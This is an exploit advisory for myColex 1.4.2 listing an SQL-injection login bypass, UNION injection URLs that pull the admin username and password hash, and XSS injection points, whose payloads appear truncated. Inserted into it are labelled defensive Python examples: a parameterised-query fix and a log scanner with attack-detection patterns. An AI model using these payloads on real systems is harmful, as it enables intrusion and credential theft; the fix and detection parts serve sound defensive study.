-------------------------------------------------------
MULTIPLE REMOTE VULNERABILITIES --my-colex 1.4.2-->
-------------------------------------------------------

CMS INFORMATION:

-->WEB: http://www.collector.ch/drupal5/index.php
-->DOWNLOAD: http://www.collector.ch/drupal5/?q=node/11
-->DEMO: http://www.collector.ch/drupal5/?q=node/10
-->CATEGORY: Management
-->DESCRIPTION: myColex is a complete museum management and collection documentation
system with long-term archiving capabilities based on Apache/PHP and MySQL...
-->RELEASED: 2009-03-24

CMS VULNERABILITY:

-->TESTED ON: Firefox 3
-->DORK: N/A
-->CATEGORY: AUTH BYPASS / SQL INJECTION / XSS
-->AFFECTED VERSION: 1.4.2 (earlier versions possibly affected too)
-->Discovered bug date: 2009-05-06
-->Reported bug date: 2009-05-06
-->Fixed bug date: 2009-05-07
-->Info patch: http://www.collector.ch/drupal5/?q=forum/15
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: To my girlfriend Marijose... my brother, sister-in-law, parents (and friends xD) for their support.
-->EXTRA-COMMENT: Thanks to everyone for putting up with me! (Love you, xikitiya!)



#################
/////////////////

INTRODUCTION:

/////////////////
#################


This application is vulnerable to SQL injection throughout.

Apart from the authentication bypass, the SQL injections cannot be exploited without a registered user account.


#########################
////////////////////////

AUTH BYPASS (SQLi):

////////////////////////
#########################


<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>


----------
EXPLOIT:
----------

Name=' or 1=1#

password=123456 (over six characters)

Then go to http://[HOST]/[HOME_PATH]/modules/admuser.php?Modus=Find

and you get the admin credentials...

Passwords are stored as MySQL SHA-1 hashes.
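Added example (not myColex's code and not part of the original advisory): a Python/SQLite reconstruction of the login check described above, with the string-built query beside a parameterised one. Table and column names (sysuser, SuID, SuUser, SuPwd) are taken from this advisory's own payloads; the rest of the schema, the exact query text and the helper names are assumptions. SQLite has no '#' comment marker, so the bypass name uses the '/*' form that the advisory's other payloads rely on.

```python
import hashlib
import sqlite3

# Added example, not myColex code. Table/column names come from the advisory's
# payloads (sysuser, SuID, SuUser, SuPwd); everything else is assumed.


def sha1_hex(password):
    # The advisory says passwords are stored as MySQL SHA-1 hashes; hashlib's
    # hex digest matches what MySQL's SHA1() would store.
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def make_db():
    # Constructed in-memory sysuser table with a single admin account.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE sysuser (SuID INTEGER PRIMARY KEY, SuUser TEXT, SuPwd TEXT)"
    )
    conn.execute(
        "INSERT INTO sysuser (SuID, SuUser, SuPwd) VALUES (1, 'admin', ?)",
        (sha1_hex("correct-horse-battery"),),
    )
    conn.commit()
    return conn


def login_vulnerable(conn, name, password):
    # The name is spliced into the SQL text, so a quote in it ends the string
    # literal and the rest of the input is parsed as SQL.
    sql = "SELECT SuID, SuUser FROM sysuser WHERE SuUser = '%s' AND SuPwd = '%s'" % (
        name,
        sha1_hex(password),
    )
    return conn.execute(sql).fetchone()


def login_fixed(conn, name, password):
    # Bound parameters: the driver hands name and hash to the engine as values,
    # so the same input is compared literally against SuUser, never parsed.
    sql = "SELECT SuID, SuUser FROM sysuser WHERE SuUser = ? AND SuPwd = ?"
    return conn.execute(sql, (name, sha1_hex(password))).fetchone()


# The advisory's bypass name ends in '#', a MySQL comment marker. SQLite has no
# '#' comment, so this uses '/*' (also used by the advisory's other payloads);
# either way the password comparison is commented out and 'or 1=1' matches
# every row.
BYPASS_NAME = "' or 1=1/*"


def demo():
    conn = make_db()
    return {
        "vulnerable_bypass": login_vulnerable(conn, BYPASS_NAME, "123456"),
        "fixed_bypass": login_fixed(conn, BYPASS_NAME, "123456"),
        "fixed_valid": login_fixed(conn, "admin", "correct-horse-battery"),
    }


if __name__ == "__main__":
    for check, row in demo().items():
        print(check, row)
```

Run it and the string-built query returns the admin row for the bypass name with any password, while the parameterised query returns nothing for the same input and still accepts the real credentials. The fix for the numeric ID parameters in the SQL injection section is the same idea: cast to int or bind as a parameter, never concatenate.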


#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


<<<<---------++++++++++++++ Condition: registered user account required +++++++++++++++++--------->>>>

<<<<---------++++++++++++++ Condition: magic quotes = ON/OFF +++++++++++++++++--------->>>>


------------------
PROOF OF CONCEPT:
------------------


Some examples:

http://[HOST]/[HOME_PATH]/modules/kategorie.php?Modus=Detail&ID=1+and+0+union+all+select+1,version(),database(),user(),version()%23

http://[HOST]/[HOME_PATH]/modules/medium.php?Modus=Detail&ID=23+and+0+UNION+ALL+SELECT+1,version(),database(),version(),user(),database(),7/*

http://[HOST]/[HOME_PATH]/modules/person.php?Modus=Detail&ID=2+AND+0+UNION+ALL+SELECT+1,2,3,4,version(),6,user(),version(),database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*

http://[HOST]/[HOME_PATH]/modules/schlagwort.php?Modus=Detail&ID=1+AND+0+UNION+ALL+SELECT+1,version(),database(),current_user(),user(),6/*

There are more...

Returns: user, version, database, ...


----------
EXPLOITS:
----------


http://[HOST]/[HOME_PATH]/modules/kategorie.php?Modus=Detail&ID=1+and+0+union+all+select+1,SuUser,SuEmail,SuPwd,SuSysAut+FROM+sysuser+WHERE+SuID=1%23

http://[HOST]/[HOME_PATH]/modules/medium.php?Modus=Detail&ID=23+and+0+UNION+ALL+SELECT+1,2,3,4,SuUser,SuPwd,6+FROM+sysuser+WHERE+SuID=1/*

Returns: username/password hash (SuID=1)


###########################
///////////////////////////

CROSS SITE SCRIPTING (XSS):

///////////////////////////
###########################


XSS is possible pretty much anywhere you like :P

Some examples:



http://[HOST]/[HOME_PATH]/modules/kalender.php?month=5&year=2009">

http://[HOST]/[HOME_PATH]/modules/ereignis.php?Modus=List&Page=1">&Order=ErAnfangsdatum

http://[HOST]/[HOME_PATH]/modules/kategorie.php?Modus=Search&Kontext=objekt">

http://[HOST]/[HOME_PATH]/modules/image.php?image=


Of course there are more...
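Added example serving both the SQL injection proof-of-concept URLs above and the XSS injection points listed here (written for this page; not part of myColex or of the advisory): a small Python scanner over Apache-style access-log lines that flags requests to the myColex modules whose ID, Page, month or year parameters are not plain integers, or whose parameters carry SQL keywords or HTML metacharacters. The log lines are constructed, the module paths and parameter names come from this advisory, and the set of parameters treated as integer-only is an assumption.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Added example for this page, not part of myColex. Module paths and parameter
# names come from the advisory; the log lines below are constructed.

# Constructed Apache combined-format lines: one normal lookup, two of the
# advisory's UNION-style requests, one reflected-HTML probe, one unrelated hit.
SAMPLE_LOG = """\
10.0.0.5 - - [06/May/2009:10:01:02 +0200] "GET /mycolex/modules/kategorie.php?Modus=Detail&ID=1 HTTP/1.1" 200 5120
10.0.0.7 - - [06/May/2009:10:01:09 +0200] "GET /mycolex/modules/kategorie.php?Modus=Detail&ID=1+and+0+union+all+select+1,version(),database(),user(),version()%23 HTTP/1.1" 200 6144
10.0.0.7 - - [06/May/2009:10:02:31 +0200] "GET /mycolex/modules/medium.php?Modus=Detail&ID=23+and+0+UNION+ALL+SELECT+1,2,3,4,SuUser,SuPwd,6+FROM+sysuser+WHERE+SuID=1/* HTTP/1.1" 200 6301
10.0.0.9 - - [06/May/2009:10:03:00 +0200] "GET /mycolex/modules/kalender.php?month=5&year=2009%22%3E%3Cb%3Ex%3C/b%3E HTTP/1.1" 200 4096
10.0.0.5 - - [06/May/2009:10:03:15 +0200] "GET /mycolex/index.php HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Parameters that myColex only ever uses as numbers (assumed from the advisory's
# URLs): anything but digits here is worth a look.
INT_PARAMS = {"ID", "Page", "month", "year"}
# SQL keywords/functions and the comment markers used in the advisory's payloads.
SQL_RE = re.compile(
    r"\b(union|select|from|where)\b|\b(version|user|database|current_user)\s*\(|#|/\*",
    re.IGNORECASE,
)
# Characters that matter when a parameter is echoed back into an HTML attribute.
HTML_RE = re.compile(r'[<>"]|javascript:', re.IGNORECASE)


def analyse_target(target):
    """Return a list of (reason, parameter) findings for one request target."""
    parts = urlsplit(target)
    # The affected scripts all live under modules/; skip everything else.
    if "/modules/" not in parts.path or not parts.path.endswith(".php"):
        return []
    findings = []
    # parse_qsl decodes %23 -> '#' and '+' -> ' ', so the checks see what the
    # PHP script would have seen in $_GET.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in INT_PARAMS and not value.isdigit():
            findings.append(("non-integer value", name))
        if SQL_RE.search(value):
            findings.append(("sql keywords", name))
        if HTML_RE.search(value):
            findings.append(("html metacharacters", name))
    return findings


def scan_log(text):
    """Return one record per log line that produced findings."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = analyse_target(match.group("target"))
        if findings:
            hits.append({
                "line": lineno,
                "ip": line.split(" ", 1)[0],
                "path": urlsplit(match.group("target")).path,
                "findings": findings,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["line"], hit["ip"], hit["path"], hit["findings"])
```

The integer check alone catches every ID-based request in this advisory, since a legitimate Modus=Detail&ID value is always a record number; the keyword check is noisier (a free-text search containing the word "from" would trip it) and is better used as a second signal. The same two rules map directly onto the fix: cast ID, Page, month and year to integers before they reach the query, and HTML-encode every parameter that is reflected back into the page.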



<<<-----------------------------EOF---------------------------------->>>ENJOY IT!


#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################